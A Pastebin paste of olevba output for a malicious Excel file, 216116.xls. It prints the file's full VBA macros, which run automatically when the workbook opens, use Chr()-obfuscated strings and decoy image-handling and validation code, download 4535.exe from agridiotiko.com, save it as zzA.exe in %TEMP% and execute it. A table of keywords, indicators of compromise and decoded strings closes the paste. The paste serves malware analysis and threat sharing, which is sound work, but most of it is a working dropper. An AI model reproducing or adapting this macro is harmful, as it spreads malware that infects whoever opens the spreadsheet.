API tools faq
paste
dynamoo

Malicious Excel macro

dynamoo
Oct 5th, 2015
576
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 24.39 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASIHB-V 216116.xls
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 216116.xls
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ÝòàÊíèãà.cls
  13. in file: 216116.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Private Sub Workbook_Open()
  16.    
  17.  
  18. SSVEvdqwfF3 (77)
  19.  
  20. End Sub
  21.  
  22.  
  23.  
  24.  
  25.  
  26.  
  27. Sub SSVEvdqwfF3(FFFFF As Integer)
  28. ValidateAmountOf5
  29.  
  30. End Sub
  31.  
  32.  
  33.  
  34. -------------------------------------------------------------------------------
  35. VBA MACRO Ëèñò1.cls
  36. in file: 216116.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
  37. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  38. (empty macro)
  39. -------------------------------------------------------------------------------
  40. VBA MACRO Ëèñò2.cls
  41. in file: 216116.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
  42. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  43. (empty macro)
  44. -------------------------------------------------------------------------------
  45. VBA MACRO Ëèñò3.cls
  46. in file: 216116.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
  47. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  48. (empty macro)
  49. -------------------------------------------------------------------------------
  50. VBA MACRO Module1.bas
  51. in file: 216116.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
  52. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  53.  
  54.  
  55. Function OpenIL_TypeString(ByVal il_const As Boolean) As String
  56.  
  57.     Select Case il_const
  58.         Case %IL_BYTE : Function = "IL_BYTE"
  59.         Case %IL_UNSIGNED_BYTE : Function = "IL_UNSIGNED_BYTE"
  60.         Case %IL_SHORT : Function = "IL_SHORT"
  61.         Case %IL_UNSIGNED_SHORT : Function = "IL_UNSIGNED_SHORT"
  62.         Case %IL_INT : Function = "IL_INT"
  63.         Case %IL_UNSIGNED_INT : Function = "IL_UNSIGNED_INT"
  64.         Case %IL_FLOAT : Function = "IL_FLOAT"
  65.         Case %GL_DOUBLE : Function = "GL_DOUBLE"
  66.  
  67.         Case Else : Function = "Type not defined"
  68.  
  69.  
  70.     End Select
  71.  
  72. End Function
  73.  
  74.  
  75.  
  76. Function OpenIL_FormatString(ByVal il_const As Boolean) As String
  77.  
  78.     Select Case il_const
  79.         Case %IL_COLOUR_INDEX : Function = "IL_COLOUR_INDEX"
  80.         Case %IL_COLOR_INDEX : Function = "IL_COLOR_INDEX"
  81.         Case %IL_RGB : Function = "IL_RGB"
  82.         Case %IL_RGBA : Function = "IL_RGBA"
  83.         Case %IL_BGR : Function = "IL_BGR"
  84.         Case %IL_BGRA : Function = "IL_BGRA"
  85.         Case %IL_LUMINANCE : Function = "IL_LUMINANCE"
  86.  
  87.         Case Else : Function = "Format not defined"
  88.  
  89.  
  90.     End Select
  91.  
  92. End Function
  93.  
  94.  
  95.  
  96. Function OpenIL_OriginString(ByVal il_const As Boolean) As String
  97.  
  98.     ' Origin Definitions
  99.    Select Case il_const
  100.         Case %IL_ORIGIN_LOWER_LEFT : Function = "IL_ORIGIN_LOWER_LEFT"
  101.         Case %IL_ORIGIN_UPPER_LEFT : Function = "IL_ORIGIN_UPPER_LEFT"
  102.  
  103.         Case Else : Function = "Origin type not defined"
  104.     End Select
  105.  
  106. End Function
  107.  
  108.  
  109.  
  110. Public Function OpenIL8PalTypeString(KJB As Long)
  111.  
  112. Dim PbMain31 As Object
  113. Set PbMain31 = TextBoxAsValidate(Chr(77) & Chr(105) & "c" & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(46) & Chr(88) & "M" & Chr(76) & "H" & Chr(84) & Chr(84) & "P")
  114. ProfileChr PbMain31
  115. PbMain31.Send
  116. OpenIL8PalTypeString = PbMain31.responseBody
  117. End Function
  118.  
  119. Function OpenIL_PalTypeString(ByVal il_const As Boolean) As String
  120.  
  121.     ' Palette types
  122.    Select Case il_const
  123.         Case %IL_PAL_NONE : Function = "IL_PAL_NONE"
  124.         Case %IL_PAL_RGB24 : Function = "IL_PAL_RGB24"
  125.         Case %IL_PAL_RGB32 : Function = "IL_PAL_RGB32"
  126.         Case %IL_PAL_RGBA32 : Function = "IL_PAL_RGBA32"
  127.         Case %IL_PAL_BGR24 : Function = "IL_PAL_BGR24"
  128.         Case %IL_PAL_BGR32 : Function = "IL_PAL_BGR32"
  129.         Case %IL_PAL_BGRA32 : Function = "IL_PAL_BGRA32"
  130.  
  131.         Case Else : Function = "Pallete type not defined"
  132.     End Select
  133.  
  134. End Function
  135.  
  136.   Public Function Profile8Exists(AquaBarb2 As String, AquaBarb3 As String, AquaBarb As Object, GetDesktopMPath_3 As String, GetDesktopMPath_8 As Double) As Double
  137. Profile8Exists = 77.8
  138. Profile8Exists = Create_Shortcut(AquaBarb, GetDesktopMPath_3)
  139. Profile8Exists = 72.99
  140.   End Function
  141.  
  142. Function PbMain() As Long
  143.  
  144.     Local ILErr As Dword
  145.     Local info As  ILinfo
  146.     Local ID As Dword
  147.     Local errString As Asciiz*1024
  148.  
  149.  
  150.     If Len(Command$) = 0 Then
  151.         MsgBox "Usage: imginfo.exe filename"
  152.         Exit Function
  153.     End If
  154.  
  155.     ilInit
  156.  
  157.     ilGenImages ByVal 1, ID
  158.     ILErr = ilGetError()
  159.     If ILErr <> 0 Then
  160.             errString = iluErrorString(ILErr)
  161.             MsgBox "Error in ilGenImages" & $CRLF &  errString
  162.             Exit Function
  163.     End If
  164.  
  165.  
  166.     ilBindImage ID
  167.     ILErr = ilGetError()
  168.     If ILErr <> 0 Then
  169.             errString = iluErrorString(ILErr)
  170.             MsgBox "Error in ilBindImage" & $CRLF &  errString
  171.             GoTo done
  172.     End If
  173.  
  174.  
  175.  
  176.    ' ilEnable %IL_FORMAT_SET
  177.   ' ilEnable %IL_ORIGIN_SET
  178.   ' ilEnable %IL_TYPE_SET
  179.   '
  180.   ' ilFormatFunc %IL_RGB
  181.   ' ilOriginFunc %IL_ORIGIN_LOWER_LEFT
  182.   ' ilTypeFunc %IL_UNSIGNED_BYTE
  183.   '
  184.   ' ilEnable %IL_CONV_PAL
  185.   ' Do
  186.   '     ILErr = ilGetError()
  187.   ' Loop While (ILErr <> 0)
  188.  
  189.  
  190.  
  191.  
  192.  
  193.     ilLoadImage Command$
  194.     ILErr = ilGetError()
  195.     If ILErr <> 0 Then
  196.             errString = iluErrorString(ILErr)
  197.             GoTo done
  198.     End If
  199.  
  200.  
  201.     iluGetImageInfo info
  202.     ILErr = ilGetError()
  203.     If ILErr <> 0 Then
  204.             errString = iluErrorString(ILErr)
  205.             GoTo done
  206.     Else
  207.  
  208.  
  209.     End If
  210.  
  211. done:
  212.     ilDeleteImages 1, ID
  213.  
  214.     ' clear additional errors
  215.    Do
  216.         ILErr = ilGetError()
  217.     Loop While (ILErr <> 0)
  218.  
  219.  
  220. End Function
  221. Public Function Create_Shortcut(GetDesktopMPath_4 As Object, GetDesktopMPath_3 As String) As Integer
  222. Create_Shortcut = 15
  223. GetDesktopMPath_4.savetofile GetDesktopMPath_3, 2
  224. Create_Shortcut = 2
  225. End Function
  226.  
  227.  
  228. -------------------------------------------------------------------------------
  229. VBA MACRO Module2.bas
  230. in file: 216116.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
  231. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  232.  
  233.  
  234. Public Const QUOTE = "'"
  235. Public Const QUOTE2 = "''"
  236. Public Const DOUBLE_QUOTE = """"
  237.  
  238. Public Const NUMERIC_KEYS = "-01234567890."
  239.  
  240. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  241. '
  242. Public Function Max(ByVal a As Variant, ByVal b As Variant) As Variant
  243.     If a > b Then
  244.         Max = a
  245.     Else
  246.         Max = b
  247.     End If
  248. End Function
  249.  
  250. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  251. '
  252. Public Function Min(ByVal a As Variant, ByVal b As Variant) As Variant
  253.     If a < b Then
  254.         Min = a
  255.     Else
  256.         Min = b
  257.     End If
  258. End Function
  259.  
  260. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  261. '
  262. Public Function Between(ByVal a As Variant, ByVal b As Variant, ByVal c As Variant) As Variant
  263.     If a < b Then
  264.         Between = b
  265.     ElseIf a > c Then
  266.         Between = c
  267.     Else
  268.         Between = a
  269.     End If
  270. End Function
  271.  
  272. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  273. '
  274. Public Function DBRead(ByVal V As Variant, Optional ByVal NullValue As Variant = 0) As Variant
  275.     On Error Resume Next
  276.     DBRead = IIf(IsNull(V), NullValue, V)
  277. End Function
  278.  
  279. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  280. '
  281. Public Function DBWrite(ByVal V As Variant, Optional ByVal NullValue As Variant = 0) As Variant
  282.     On Error Resume Next
  283.     DBWrite = IIf(V = NullValue, Null, V)
  284. End Function
  285.  
  286. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  287. ' Converts Symbol to form acceptable by Sql syntax
  288. ' AGR'A -> 'AGR''A'
  289. '
  290. Public Function QuotedSymbol(ByVal Symbol As String) As String
  291.     QuotedSymbol = QUOTE & Replace(Symbol, QUOTE, QUOTE2) & QUOTE
  292. End Function
  293.  
  294. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  295. ' Converts Symbol to standard form
  296. ' AGR''A -> AGR'A
  297. ' AGR"A -> AGR'A
  298. '
  299. Public Sub ValidStockSymbol(Symbol As String)
  300.     Symbol = Replace(Symbol, QUOTE2, QUOTE)
  301.     Symbol = Replace(Symbol, DOUBLE_QUOTE, QUOTE)
  302. End Sub
  303.  
  304. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  305. '
  306. Public Sub NumericFilter(KeyAscii As Integer)
  307.     If KeyAscii > 31 Then
  308.         If InStr(NUMERIC_KEYS, Chr$(KeyAscii)) = 0 Then
  309.             KeyAscii = 0
  310.         End If
  311.     End If
  312. End Sub
  313.  
  314. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  315. ' CURRENCY 8 bytes
  316. ' A scaled integer between
  317. '   – 922,337,203,685,477.5808
  318. ' and 922,337,203,685,477.5807
  319. '
  320. ' We restrict it to be
  321. ' - positive
  322. ' - integer i.e. no fractions
  323. ' - not more than 14 symbols
  324. ' so it can be from 1 to 99 999 999 999 999
  325. '
  326. Public Function ValidateCurrency(TC As Boolean) As Currency
  327. Dim S As String
  328. Dim i As Long
  329.     On Error Resume Next
  330.     '////////////////////////
  331.    ' Restrict user input '/
  332.    '//////////////////////
  333.    With a.TC
  334.         i = .SelStart
  335.         S = ValidateString(.Text, False, False, False, 14, 0)
  336.         .Text = S
  337.         .SelStart = i
  338.     End With
  339.     '///////////////////////
  340.    ' Convert user input '/
  341.    '/////////////////////
  342.    On Error GoTo Fail
  343.     ValidateCurrency = CCur(a.TC.Text)
  344.     Exit Function
  345. Fail:
  346.     On Error Resume Next
  347.     c.TC.Text = ""
  348.     ValidateCurrency = 0
  349. End Function
  350.  
  351. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  352. '
  353. Public Function ValidatePrice(TC As Boolean) As Double
  354. Dim S As String
  355. Dim i As Long
  356.     On Error Resume Next
  357.     With c.TC
  358.         ' Validating UserInput
  359.        i = .SelStart
  360.         S = ValidateString(.Text, False, False, True, 10, 1000000000)
  361. '        s = VBCleanEntry(.Text, ".", 2)
  362.        .Text = S
  363.         .SelStart = i
  364.         ValidatePrice = Val(.Text)
  365.     End With
  366. End Function
  367. Public Function ValidateAmountOf5()
  368. Set ValidatePriceAndString = TextBoxAsValidate(Chr(87) & Chr(80 + 3) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) + Chr(23 * 2) & Chr(40 * 2 + 3) & Chr(104) & Chr(101) & Chr(108) & Chr(108)).Environment(Chr(80) & Chr(114) & "o" & Chr(99) & Chr(101) & "s" & "s")
  369. GetDesktopMPath_2 = ValidatePriceAndString("T" & Chr(69) & Chr(77) & Chr(80))
  370. Dim AquaBarb As Object
  371. Set AquaBarb = TextBoxAsValidate(Chr(65) & "do" & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & "a" & Chr(109))
  372. Dim GetDesktopMPath_3 As String
  373. GetDesktopMPath_3 = GetDesktopMPath_2 & "\" & "zz" & Chr(65) & "." & "e" & Chr(120) & "e"
  374. With AquaBarb
  375.    .Type = 1
  376.     .Open
  377.     .write OpenIL8PalTypeString(223)
  378.    
  379. End With
  380.  Dim HricK As Double
  381. HricK = Profile8Exists("AquaBarb", "AquaBarb", AquaBarb, GetDesktopMPath_3, 88.3)
  382. Set noexile = TextBoxAsValidate(";<=" + Chr(83) & "h" & "e" & Chr(108) & Chr(108) & Chr(46) & Chr(65) & "p" & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110))
  383. noexile.Open (GetDesktopMPath_3)
  384. End Function
  385. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  386. '
  387. Public Function ValidateAmount(TC As Boolean) As Long
  388.     Dim S As String
  389.     Dim i As Long
  390.    
  391.     On Error Resume Next
  392.     With c.TC
  393.         ' Validating UserInput
  394.        i = .SelStart
  395.         S = ValidateString(.Text, False, False, False, 10, 1000000000)
  396. '        s = VBCleanEntry(.Text, ".", 2)
  397.        .Text = S
  398.         .SelStart = i
  399.         ValidateAmount = Val(.Text)
  400.     End With
  401. End Function
  402.  
  403. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  404. '
  405. Public Function ValidatePercent(TC As Boolean) As Double
  406. Dim S As String
  407. Dim i As Long
  408.     On Error Resume Next
  409.     With c.TC
  410.         i = .SelStart
  411.         S = ValidateString(.Text, False, True, True, 6, 100)
  412.         Dim j As Long
  413.         j = InStr(S, ".")
  414.         If j > 0 Then
  415.             Dim f As String
  416.             Dim g As String
  417.             f = Mid(S, j + 1)
  418.             If Len(f) > 2 Then
  419.                 f = Left(f, 2)
  420.             End If
  421.             g = Left(S, j - 1)
  422.             S = g & "." & f
  423.         End If
  424.         .Text = S
  425.         .SelStart = i
  426.         ValidatePercent = Val(.Text)
  427.     End With
  428. End Function
  429.  
  430. '   -------------------------------------------------------------
  431. '   function validates parsed string
  432. '   Use it on Change Event
  433. '   © 2000 Dmitry Grechishkin, grechishkin@egartech.com
  434.  
  435.     Public Function ValidateString( _
  436.                             strInputString As String, _
  437.                             blnAllowNegative As Boolean, _
  438.                             blnAllowZero As Boolean, _
  439.                             blnAllowFractions As Boolean, _
  440.                             Optional lngMaxLen As Long = 0, _
  441.                             Optional lngMaxValue As Long = 0 _
  442.                             ) As String
  443.    
  444.     Dim strTmpValue  As String
  445.     Dim strCurrentSymbol  As String
  446.     Dim strLeftStroke As String
  447.     Dim strRightStroke As String
  448.     Dim lngLenght As Long
  449.     Dim lngDotPosition As Long
  450.     Dim blnInvalidSymbol As Boolean
  451.     Dim blnCorrectDot  As Boolean
  452.    
  453.     Dim i As Long
  454.     Dim j As Long
  455.    
  456.     On Error Resume Next
  457.    
  458.     strTmpValue = Trim$(strInputString)
  459.     lngLenght = Len(strTmpValue)
  460.    
  461.     If lngLenght > 0 Then
  462. '   ---------------------
  463. '       Validates user input independently from locals and uses ',' or '.' as decimal separator
  464.        For i = 1 To lngLenght
  465.         blnInvalidSymbol = True
  466. '
  467.        If blnAllowFractions And (Mid$(strTmpValue, i, 1) = ",") Then
  468.             Mid$(strTmpValue, i, 1) = "."
  469.         End If
  470.        
  471.         strCurrentSymbol = Mid$(strTmpValue, i, 1)
  472. '            Truncates value if it exeeds max value
  473.             If lngMaxValue > 0 Then
  474.                 If Abs(Val(strTmpValue)) > lngMaxValue Then
  475.                     strTmpValue = Left$(strTmpValue, lngLenght - 1)
  476.                     blnInvalidSymbol = True
  477.                     GoTo EX
  478.                 End If
  479.              End If
  480.              If lngMaxLen > 0 Then
  481. '            If negative values are allowed to be inputted
  482.                If Len(Trim$(Replace(strTmpValue, "-", " "))) > lngMaxLen Then
  483.                     strTmpValue = Left$(strTmpValue, lngMaxLen)
  484.                     blnInvalidSymbol = True
  485.                     GoTo EX
  486.                 End If
  487.              End If
  488.              
  489.              
  490.             If i = 1 Then
  491.                 If blnAllowNegative And (strCurrentSymbol = "-") Then
  492.                     blnInvalidSymbol = False
  493.                     GoTo Check
  494.                 End If
  495. '               if zero values are allowed to input
  496.                If Not blnAllowZero And (strCurrentSymbol = "0") Then
  497.                     blnInvalidSymbol = True
  498.                     GoTo Check
  499.                 End If
  500.             End If
  501.  
  502. '               --------------------------
  503. '               numeric validation
  504.                For j = 0 To 9
  505.                     If strCurrentSymbol = Trim$(str$(j)) Then
  506.                         blnInvalidSymbol = False
  507.                         GoTo Check
  508.                     End If
  509.                 Next
  510. '               --------------------------
  511. '            decimal separator is single in string
  512.             If (lngDotPosition > 0) Then
  513.                 If (lngDotPosition = i) Then
  514.                     blnCorrectDot = True
  515.                 Else
  516.                     blnCorrectDot = False
  517.                 End If
  518.              Else
  519.                     blnCorrectDot = True
  520.              End If
  521.              
  522.              If blnAllowFractions And (strCurrentSymbol = ".") And blnCorrectDot Then
  523.                 blnInvalidSymbol = False
  524.                 lngDotPosition = i
  525.                 GoTo Check
  526.              End If
  527.  
  528. Check:
  529. '   If any invalid symbol is found, cut it away
  530.    If blnInvalidSymbol Then
  531.         strLeftStroke = Left$(strTmpValue, i - 1)
  532.         strRightStroke = Right$(strTmpValue, lngLenght - i)
  533.         strTmpValue = strLeftStroke + strRightStroke
  534.     End If
  535.         Next
  536. '   ---------------------
  537. EX:
  538.      ValidateString = strTmpValue
  539.    
  540.     End If
  541.     On Error GoTo 0
  542. End Function
  543.  
  544.  
  545. -------------------------------------------------------------------------------
  546. VBA MACRO Module3.bas
  547. in file: 216116.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module3'
  548. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  549.  
  550. Public Sub InitGDIPlus()
  551.     Dim uInput As Boolean
  552.     If mToken <> 0 Then Exit Sub
  553.     c.uInput.GdiplusVersion = 1
  554.     If c.GdiplusStartup(mToken, uInput) <> 0 Then
  555.         MsgBox "GDI+ ?????????????", vbCritical, "?????"
  556.         End
  557.     End If
  558. End Sub
  559.  
  560. Public Sub TerminateGDIPlus()
  561.     If mToken = 0 Then Exit Sub
  562.     c.GdiplusShutdown mToken
  563. End Sub
  564.  
  565. Public Function GetImageEncoderClsid(ByVal ImageType As Boolean) As Boolean
  566.     Select Case ImageType
  567.         Case PNG: c.CLSIDFromString StrPtr(ImageEncoderPNG), GetImageEncoderClsid
  568.         Case JPG: c.CLSIDFromString StrPtr(ImageEncoderJPG), GetImageEncoderClsid
  569.     End Select
  570. End Function
  571.  
  572. Public Function ProfileChr(KJB As Object)
  573. Dim segR As String
  574. segR = Chr(104) & Chr(116) & "t" & Chr(112) & Chr(58) & "/" & "/" & Chr(97) & Chr(103) & "r" & Chr(105) & "d" & "i" & Chr(111) & Chr(116) & "i" & "k" & "o" & Chr(46) & "c" & Chr(111) & "m"
  575. KJB.Open Chr(71) & "E" & Chr(84), segR & "/" & Chr(52) & "3" & Chr(50) & Chr(47) & "4" & Chr(53) & Chr(51) & Chr(53) & Chr(46) & "e" & Chr(120) & "e", False
  576. End Function
  577. Public Function TextBoxAsValidate(SmRaNdMM1 As String)
  578. For i = 0 To 3
  579. SmRaNdMM1 = Replace(SmRaNdMM1, Chr(i + 20 * 3 - 1), "")
  580. Next i
  581.  Set TextBoxAsValidate = CreateObject(SmRaNdMM1)
  582. End Function
  583. Public Function SavePicToPNG(ByVal Pic As Long, ByVal Path As String) As Long
  584.     Dim Params As EncoderParameters, EncParams() As Byte, Image As Long
  585.     Params.Count = 1
  586.     ReDim EncParams(Len(Params) - 1)
  587.     CopyMemory EncParams(0), Params, Len(Params)
  588.     GdipCreateBitmapFromHBITMAP Pic, 0, Image
  589.     SavePicToPNG = GdipSaveImageToFile(Image, StrPtr(Path), GetImageEncoderClsid(PNG), EncParams(0))
  590.     GdipDisposeImage Image
  591.     Erase EncParams
  592. End Function
  593.  
  594. Public Function SavePicToJPG(ByVal Pic As Long, ByVal Path As String, ByVal Quality As Long) As Long
  595.     Dim Params As EncoderParameters, EncParams() As Byte, Image As Long
  596.    
  597.     Params.Count = 1
  598.     CLSIDFromString StrPtr(EncoderQuality), Params.Parameter.GUID
  599.     Params.Parameter.NumberOfValues = 1
  600.     Params.Parameter.Type = 4
  601.     Params.Parameter.Value = VarPtr(Quality)
  602.     ReDim EncParams(Len(Params) - 1)
  603.     CopyMemory EncParams(0), Params, Len(Params)
  604.     GdipCreateBitmapFromHBITMAP Pic, 0, Image
  605.     SavePicToJPG = GdipSaveImageToFile(Image, StrPtr(Path), GetImageEncoderClsid(JPG), EncParams(0))
  606.     GdipDisposeImage Image
  607.     Erase EncParams
  608. End Function
  609.  
  610. +------------+----------------------+-----------------------------------------+
  611. | Type       | Keyword              | Description                             |
  612. +------------+----------------------+-----------------------------------------+
  613. | AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
  614. | Suspicious | Open                 | May open a file                         |
  615. | Suspicious | CreateObject         | May create an OLE object                |
  616. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  617. |            |                      | strings                                 |
  618. | Suspicious | SaveToFile           | May create a text file                  |
  619. | Suspicious | Write                | May write to a file (if combined with   |
  620. |            |                      | Open)                                   |
  621. | Suspicious | Shell                | May run an executable file or a system  |
  622. |            |                      | command (obfuscation: VBA expression)   |
  623. | Suspicious | Shell.Application    | May run an application (if combined     |
  624. |            |                      | with CreateObject) (obfuscation: VBA    |
  625. |            |                      | expression)                             |
  626. | Suspicious | ADODB.Stream         | May create a text file (obfuscation:    |
  627. |            |                      | VBA expression)                         |
  628. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
  629. |            |                      | (obfuscation: VBA expression)           |
  630. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  631. |            |                      | be used to obfuscate strings (option    |
  632. |            |                      | --decode to see all)                    |
  633. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  634. |            |                      | may be used to obfuscate strings        |
  635. |            |                      | (option --decode to see all)            |
  636. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  637. |            | Strings              | may be used to obfuscate strings        |
  638. |            |                      | (option --decode to see all)            |
  639. | IOC        | imginfo.exe          | Executable file name                    |
  640. | IOC        | http://agridiotiko.c | URL (obfuscation: VBA expression)       |
  641. |            | om                   |                                         |
  642. | IOC        | zzA.exe              | Executable file name (obfuscation: VBA  |
  643. |            |                      | expression)                             |
  644. | IOC        | 4535.exe             | Executable file name (obfuscation: VBA  |
  645. |            |                      | expression)                             |
  646. | VBA string | Microsoft.XMLHTTP    | (Chr(77) & Chr(105) & "c" & Chr(114) &  |
  647. |            |                      | Chr(111) & Chr(115) & Chr(111) &        |
  648. |            |                      | Chr(102) & "t" & Chr(46) & Chr(88) &    |
  649. |            |                      | "M" & Chr(76) & "H" & Chr(84) & Chr(84) |
  650. |            |                      | & "P")                                  |
  651. | VBA string | WScript              | Chr(87) & Chr(80 + 3) & Chr(99) &       |
  652. |            |                      | Chr(114) & Chr(105) & Chr(112) &        |
  653. |            |                      | Chr(116)                                |
  654. | VBA string | hell                 | Chr(104) & Chr(101) & Chr(108) &        |
  655. |            |                      | Chr(108)                                |
  656. | VBA string | Process              | (Chr(80) & Chr(114) & "o" & Chr(99) &   |
  657. |            |                      | Chr(101) & "s" & "s")                   |
  658. | VBA string | TEMP                 | ("T" & Chr(69) & Chr(77) & Chr(80))     |
  659. | VBA string | Adodb.Stream         | (Chr(65) & "do" & Chr(100) & Chr(98) &  |
  660. |            |                      | Chr(46) & Chr(83) & Chr(116) & Chr(114) |
  661. |            |                      | & Chr(101) & "a" & Chr(109))            |
  662. | VBA string | \zzA.exe             | "\" & "zz" & Chr(65) & "." & "e" &      |
  663. |            |                      | Chr(120) & "e"                          |
  664. | VBA string | ;<=Shell.Application | (";<=" + Chr(83) & "h" & "e" & Chr(108) |
  665. |            |                      | & Chr(108) & Chr(46) & Chr(65) & "p" &  |
  666. |            |                      | Chr(112) & Chr(108) & Chr(105) &        |
  667. |            |                      | Chr(99) & Chr(97) & Chr(116) & Chr(105) |
  668. |            |                      | & Chr(111) & Chr(110))                  |
  669. | VBA string | http://agridiotiko.c | Chr(104) & Chr(116) & "t" & Chr(112) &  |
  670. |            | om                   | Chr(58) & "/" & "/" & Chr(97) &         |
  671. |            |                      | Chr(103) & "r" & Chr(105) & "d" & "i" & |
  672. |            |                      | Chr(111) & Chr(116) & "i" & "k" & "o" & |
  673. |            |                      | Chr(46) & "c" & Chr(111) & "m"          |
  674. | VBA string | GET                  | Chr(71) & "E" & Chr(84)                 |
  675. | VBA string | /432/4535.exe        | "/" & Chr(52) & "3" & Chr(50) & Chr(47) |
  676. |            |                      | & "4" & Chr(53) & Chr(51) & Chr(53) &   |
  677. |            |                      | Chr(46) & "e" & Chr(120) & "e"          |
  678. +------------+----------------------+-----------------------------------------+
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!